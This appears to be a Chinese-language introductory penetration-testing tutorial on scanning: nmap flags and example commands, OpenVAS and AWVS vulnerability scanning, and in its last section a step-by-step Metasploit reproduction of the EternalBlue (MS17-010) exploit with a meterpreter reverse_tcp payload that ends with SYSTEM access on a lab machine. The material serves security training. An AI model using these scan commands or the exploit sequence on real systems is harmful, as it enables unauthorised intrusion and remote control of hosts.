扫描技术(web安全入门06)

资产发现

发现目标环境中哪些资产,联网设备,主机,服务器,各种服务等。

资产整理,发现,收集。


一、扫描神器 nmap

1、官网:nmap.org

2、跨平台

3、自动集成在 kali

4、如果使用 kali 中的 nmap 扫描的时候,建议桥接

5、如果在没有指定端口的情况下,默认扫描 top 1000 端口

6、推荐一本书,Nmap 渗透测试指南

1.1 主机发现 

有哪些主机在线,IP 地址

1.2 端口扫描 

开启的端口,端口上运行的服务

扫描方式

TCP 全链接扫描

 SYN 半连接扫描

隐蔽扫描

Null 扫描

Xmas 扫描

 FIN 扫描

1.3 参数

-sP/-sn 不进行端口扫描

-p 指定端口

-p 80

-p 1-80

-p 80,3389,8080

-p 1-65535

-p-

-sT TCP 全连接扫描(建立完整的三次握手过程)

-sS SYN 半连接扫描(只进行三次握手的前两次)

-sN Null 扫描

-sX Xmas 扫描

-sF Fin 扫描

-sV 显示服务的详细版本

-O 获取操作系统类型(不太准确)

-oN/-oX 保存扫描结果,txt/xml

-A 全面扫描

-T0 ~ -T5 时序选项

1.4 命令  

nmap

nmap 127.0.0.1

nmap 192.168.1.0/24 -sP

namp 127.0.0.1 -p�nmap 192.168.1.1 -p 80 -sT

nmap 192.168.1.1 -p 80 -sS

nmap 192.168.1.1 -p 80 -sX

nmap 192.168.1.1 -p 80 -sN

nmap 192.168.1.1 -p 80 -sF

namp -sV 127.0.0.1 -p 22

nmap -p- -A 127.0.0.1 -oN result.txt


1.5 工具 

wireshark

ipaddr == 10.0.105.1 and tcp.port == 80

1.6 端口状态 

开放、关闭、过滤、未过滤、开放|过滤、关闭|过滤

参考《Nmap 渗透测试指南》介绍

二、网络漏洞扫描

我们可以通过网络漏洞扫描,全网络漏洞扫描面掌握目标服务器存在的安全隐患。市面上常

用的扫描器有 Nessus、NeXpose、OpenVAS 等,这是扫描器都有商业版和家庭版。

我们这里使用的是 OpenVAS,可以用来识别远程主机、Web 应用存在的各种漏洞。Nessus 

曾是业内开源扫描工具的的标准,在 Nessus 商业化不再开放源代码后,在它的原始项目中

分支出 OpenVAS 开源项目。经过多年发展,OpenVAS 已经成为当前最好的开源漏洞扫描

器,功能非常强大,甚至可以跟一些商业漏洞扫描器相媲美。

OpenVAS 使用 NVT (基于漏洞库扫描)脚本对多种远程系统(包括 Windows、Linux、UNIX 

以及 Web 应用程序)的安全问题进行检测


2.1 漏洞扫描原理 

网络漏洞扫描是指利用一些自动化的工具发现网上的各类主机设备的安全漏洞。

漏洞扫描通常分为两大类

2.2 黑盒扫描 

黑盒扫描一般通过远程识别服务的类型和版本,对服务是否存在漏洞进行判定。在一些最新

的漏洞扫描软件中,应用了一些更高级的的技术,比如模拟渗透攻击。

2.3 白盒测试 

白盒扫描就是在具有主机权限的情况下进行漏洞扫描。比如微软的补丁更新程序会定期对你

的操作系统进行扫描,查找存在的安全漏洞,并向你推送详细的系统补丁。

白盒扫描的结果更加准确,但是一般来说他所是被出来的漏洞不应当直接作为渗透测试的最

终数据,因为这些漏洞由于防火墙和各类防护软件的原因很可能无法在外部渗透的测试中得

到利用。同时,一般情况下,你是没有机会获取用户的用户名和口令。

漏洞扫描器一般会附带一个用于识别主机漏洞的特征库,并定期进行更新。在漏洞扫描的时

候,就是利用特征库里的脚本与目标系统的反馈信息进行匹配,如果能匹配上,就说明存在

一个漏洞。

漏洞扫描器再识别漏洞的过程中,会向目标发送大量的数据包,有时候会导致目标系统拒绝

服务或被扫描数据包阻塞,扫描行为会被对方的入侵检测设备发现。

漏洞扫描器扫描出的结果通常会有很多误报(报告发现的漏洞实际不存在)或者漏报(未报

告发现的漏洞实际存在)。因此,需要对扫描结果进行人工分析,确定哪些漏洞是实际存在

的,这个过程叫做漏洞验证。这是渗透测试过程中不可缺少的一步,只有验证漏洞存在的真

实性,才能对漏洞进行深度利用。

渗透测试工作中,在得到客户认可的情况下,可以使用扫描器进行扫描,但使用时一定要注

意规避风险,对其系统运行可能造成的影响降到最低。


三、OpenVAS 扫描

3.1ip 扫描目标 

开始进行扫描的时候需要新建一个目标。

新建目标

填写好相关信息,点击[Create].

3.2 扫描策略 

查看扫描模板,就是扫描过程中使用的扫描策略和配置,这些扫描模板也可自己配置。

3.3 扫描任务 

创建好目标之后,我们创建扫描任务。

新建任务


填写好相关信息,名称自定义。扫描目标要选择之前配置过的,会以下拉列表的形式展现。

创建好扫描目标,点击开始扫描

3.4 扫描完成 

点击任务状态,可以查看扫描结果

这里我们发现目标主机存在“永恒之蓝”漏洞

3.5 扫描报告 

我们将扫描结果以报告的形式保存下来。


四、Web 漏洞扫描

随着互联网的发展,Web 应用越来越多,同时 Web 应用的攻击成本、攻击难度都比较低,

Web 应用成为黑客攻击的主要目标。无论黑客处于什么样的目的,Web 应用所面临的挑战

都很大的。

如何即时、快速的发现漏洞,并且修补漏洞,减轻和消除 Web 安全风险成为安全行业的重

要课题。

小型的 Web 应用几十上百个页面,大型的 Web 应用成千上万个页面,如果靠人工的方法,

显然是不可取的。因此我们就需要借助与自动化工具,帮助审计员去发现 Web 漏洞。

市面上的 Web 漏洞扫描器有很多,其中 IBM 公司的 AppScan 和商业化 Web 漏洞扫描器

AWVS 未优秀。Web 漏洞扫描器大同小异,本课程以 AWVS 未例子,讲解 Web 漏洞扫描

器的使用。


4.1Web 漏洞扫描原理 

进行 Web 漏洞扫描的时候,大致分为以下几个步骤:

1、爬行网站目录

爬行 asp、.net、php 网站

框架类的不建议扫描,例如:java 框架

2、使用漏洞脚本扫描

3、保存扫描结果

4.2 使用 AWVS 扫描 testfire.net 

点击[New Scan],即可打开扫描向导,在 Website URL 中输入网址[http://www.testfire.net],

跟着向导一步一步配置即可。

4.3 关于漏洞 

1、漏洞名称

2、漏洞风险等级

高危|中危|低危|信息泄露

3、漏洞的描述

4、漏洞的危害

5、修复建议

五、永恒之蓝漏洞复现

工具:MSF(metasploit framework)

具体过程

msfconsole

search ms17-010

use exploit/windows/smb/ms17_010_eternalblue

set payload windows/x64/meterpreter/reverse_tcp

show options

set RHOSTS 192.168.1.143 //目标靶机 ip

set LHOST 192.168.1.142 //本机 IP

exploit


成功拿到靶机的 system 权限

©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 214,313评论 6 496
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 91,369评论 3 389
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 159,916评论 0 349
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 57,333评论 1 288
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 66,425评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 50,481评论 1 292
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,491评论 3 412
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 38,268评论 0 269
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,719评论 1 307
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 37,004评论 2 328
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 39,179评论 1 342
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,832评论 4 337
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,510评论 3 322
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 31,153评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,402评论 1 268
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 47,045评论 2 365
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 44,071评论 2 352

推荐阅读更多精彩内容